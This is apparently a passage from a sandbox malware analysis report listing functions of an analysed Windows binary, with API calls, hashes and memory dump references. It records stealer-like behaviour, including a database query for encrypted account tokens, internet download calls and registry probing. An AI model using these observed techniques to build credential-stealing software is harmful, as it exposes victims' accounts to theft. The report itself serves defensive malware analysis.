                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          • API String ID: 3073930149-1079375795
                          • Opcode ID: df0d901d2b0f563244a4750cab4bff0610a1159770ab6b07634c4d911ee0aced
                          • Instruction ID: f3ebce9368cd3ddcef560f9fb02de06f0e249f32f023b29952cbf51ef4b0d7cd
                          • Opcode Fuzzy Hash: df0d901d2b0f563244a4750cab4bff0610a1159770ab6b07634c4d911ee0aced
                          • Instruction Fuzzy Hash: 9CB156719101099BDB04FBA0CC6ADEE7B38BF94301F50465AF907A7191EF346A4DCB66
                          Function 00556770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          • API String ID: 1494266314-163128923
                          • Opcode ID: 6af148906b4036e8cd00bb592a2c7fa66c4ca73109be37656a3724e3e8ccdfee
                          • Instruction ID: 1168a108d440578a3b88352e1a1992de71763d29cb89d12ad09c8206e86b6754
                          • Opcode Fuzzy Hash: 6af148906b4036e8cd00bb592a2c7fa66c4ca73109be37656a3724e3e8ccdfee
                          • Instruction Fuzzy Hash: 71F0893098424AFFE3449FE0E91972C7B70FB08703F24419AF60587290D67C4B41EB9A
                          Function 00544FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00544FCA
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00544FD1
                          • InternetOpenA.WININET(00560DDF,00000000,00000000,00000000,00000000), ref: 00544FEA
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00545011
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00545041
                          • InternetCloseHandle.WININET(?), ref: 005450B9
                          • InternetCloseHandle.WININET(?), ref: 005450C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          • API String ID: 3066467675-0
                          • Opcode ID: a4f9a4164eda008e3c66823cec553df27d72fbb89fb14a765afa5fc77220a7fa
                          • Instruction ID: 982d4b4f9ccea9d7c363bfcab8c934c0b217a0aaa90232d2542d3496d4a9ef8e
                          • Opcode Fuzzy Hash: a4f9a4164eda008e3c66823cec553df27d72fbb89fb14a765afa5fc77220a7fa
                          • Instruction Fuzzy Hash: AC3107B4A40218ABDB20CF54DC89BDDBBB4FB48704F5081D9EA09A7281D7746E858F99
                          Function 005583DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00558426
                          • wsprintfA.USER32 ref: 00558459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0055847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0055848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00558499
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                          • RegQueryValueExA.ADVAPI32(00000000,0123F008,00000000,000F003F,?,00000400), ref: 005584EC
                          • lstrlen.KERNEL32(?), ref: 00558501
                          • RegQueryValueExA.ADVAPI32(00000000,0123EFD8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00560B34), ref: 00558599
                          • RegCloseKey.ADVAPI32(00000000), ref: 00558608
                          • RegCloseKey.ADVAPI32(00000000), ref: 0055861A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          • API String ID: 3896182533-4073750446
                          • Opcode ID: 2060fb0a5a044d894fd238b020ce03e4264bd6bd7d1b79476edd78c3e5ab572c
                          • Instruction ID: 771b677b6ea2fe72d8ad1349b6ce3bf187fe8077ce4a3b2c10e13faffa7866a9
                          • Opcode Fuzzy Hash: 2060fb0a5a044d894fd238b020ce03e4264bd6bd7d1b79476edd78c3e5ab572c
                          • Instruction Fuzzy Hash: 14217C7194021CABEB24DB54CC84FE9B7B8FB48700F10C1D9E609A6140DF74AA85CFE4
                          Function 00557690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005576A4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 005576AB
                          • RegOpenKeyExA.ADVAPI32(80000002,0122BBF8,00000000,00020119,00000000), ref: 005576DD
                          • RegQueryValueExA.ADVAPI32(00000000,0123F140,00000000,00000000,?,000000FF), ref: 005576FE
                          • RegCloseKey.ADVAPI32(00000000), ref: 00557708
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 2321066e657f836a8166b3c6ecaacf1eee969fd9f03b64cd9250d60dcc0a1f4a
                          • Instruction ID: 608aabfbea9ddaaab5bbc92660ad53ed3c26a568b9e027c14e1f19f51b2f1a3f
                          • Opcode Fuzzy Hash: 2321066e657f836a8166b3c6ecaacf1eee969fd9f03b64cd9250d60dcc0a1f4a
                          • Instruction Fuzzy Hash: 150144B5A44308BBEB00DBE4EC59F6D7BB8EB48701F208456FE05D7190D67899048B55
                          Function 00557720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557734
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0055773B
                          • RegOpenKeyExA.ADVAPI32(80000002,0122BBF8,00000000,00020119,005576B9), ref: 0055775B
                          • RegQueryValueExA.ADVAPI32(005576B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0055777A
                          • RegCloseKey.ADVAPI32(005576B9), ref: 00557784
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: 16bee51e953570c8c45039db2b45897407176c75f8774393f6a1f05b6fd09a47
                          • Instruction ID: 292d2f52c82b46fda7cd745e4ecb21fef52fd798bb7d2d9fa0c603b26a19de2c
                          • Opcode Fuzzy Hash: 16bee51e953570c8c45039db2b45897407176c75f8774393f6a1f05b6fd09a47
                          • Instruction Fuzzy Hash: 9B0117B5A40308BBEB00DBE4DC49FAEBBB8FB48701F108556FA05A7291DA7455048B65
                          Function 005592E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(:U,80000000,00000003,00000000,00000003,00000080,00000000,?,00553AEE,?), ref: 005592FC
                          • GetFileSizeEx.KERNEL32(000000FF,:U), ref: 00559319
                          • CloseHandle.KERNEL32(000000FF), ref: 00559327
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID: :U$:U
                          • API String ID: 1378416451-4244293621
                          • Opcode ID: b06fb96695490f2d277ed62c687cc1c785d4db56b4d43b34a5565ba5e32ca69f
                          • Instruction ID: cfee92aecded88b162ce08e39543b465e4ee8bd36b1d6ad090f4dc942507a950
                          • Opcode Fuzzy Hash: b06fb96695490f2d277ed62c687cc1c785d4db56b4d43b34a5565ba5e32ca69f
                          • Instruction Fuzzy Hash: 5DF0AF74E40208FBEB10DFB4DC18F9E7BB9FB48311F21CA55BA11A72C0D67896009B44
                          Function 005540B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 005540D5
                          • RegOpenKeyExA.ADVAPI32(80000001,0123E668,00000000,00020119,?), ref: 005540F4
                          • RegQueryValueExA.ADVAPI32(?,0123F560,00000000,00000000,00000000,000000FF), ref: 00554118
                          • RegCloseKey.ADVAPI32(?), ref: 00554122
                          • lstrcat.KERNEL32(?,00000000), ref: 00554147
                          • lstrcat.KERNEL32(?,0123F500), ref: 0055415B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValuememset
                          • String ID:
                          • API String ID: 2623679115-0
                          • Opcode ID: 590c240c1f3a23c0cde07b4701cb8cf0c253bc969a2b188c03c21645385ecbb3
                          • Instruction ID: 788d5956d0849b38476e53e25d0df026bbd32bc410b35bf00aa33cbf5d60ca0a
                          • Opcode Fuzzy Hash: 590c240c1f3a23c0cde07b4701cb8cf0c253bc969a2b188c03c21645385ecbb3
                          • Instruction Fuzzy Hash: FD41BAB6D401087BDB14EBA0DC5AFFD777DB788300F008559B61A56181EA755B8C8B92
                          Function 005499C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                          • ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                          • LocalFree.KERNEL32(0054148F), ref: 00549A90
                          • CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: 85bf32218a5a8cde99109713e77b4f2948a1f5fcafcfd9be88ecfc99463529b2
                          • Instruction ID: a57ad703dd1ff59bce20c082efda804b174ce4f8819002a61e2aa5c29e7e9215
                          • Opcode Fuzzy Hash: 85bf32218a5a8cde99109713e77b4f2948a1f5fcafcfd9be88ecfc99463529b2
                          • Instruction Fuzzy Hash: A7312D74A00209EFDB14CF95C986BEE7BB5FF48345F208159E911A7290D778A941CFA1
                          Function 0055C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Typememset
                          • String ID:
                          • API String ID: 3530896902-3916222277
                          • Opcode ID: 07f245fd48b73aff25ebfb778a9af897bde7204d4775b670915d28a41e9c8466
                          • Instruction ID: ce9281dff85c9b5005af000fd7b2753ae4e2eba6219be91b96ecabee3c26b608
                          • Opcode Fuzzy Hash: 07f245fd48b73aff25ebfb778a9af897bde7204d4775b670915d28a41e9c8466
                          • Instruction Fuzzy Hash: 3241E77110079C5EDB218B248CA4FFB7FF8AF45705F1448A9ED8A86182D271AA49CF60
                          Function 00554780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcat.KERNEL32(?,0123F548), ref: 005547DB
                            • Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00554801
                          • lstrcat.KERNEL32(?,?), ref: 00554820
                          • lstrcat.KERNEL32(?,?), ref: 00554834
                          • lstrcat.KERNEL32(?,0122A7C0), ref: 00554847
                          • lstrcat.KERNEL32(?,?), ref: 0055485B
                          • lstrcat.KERNEL32(?,0123E588), ref: 0055486F
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 00558D90: GetFileAttributesA.KERNEL32(00000000,?,00541B54,?,?,0056564C,?,?,00560E1F), ref: 00558D9F
                            • Part of subcall function 00554570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00554580
                            • Part of subcall function 00554570: RtlAllocateHeap.NTDLL(00000000), ref: 00554587
                            • Part of subcall function 00554570: wsprintfA.USER32 ref: 005545A6
                            • Part of subcall function 00554570: FindFirstFileA.KERNEL32(?,?), ref: 005545BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
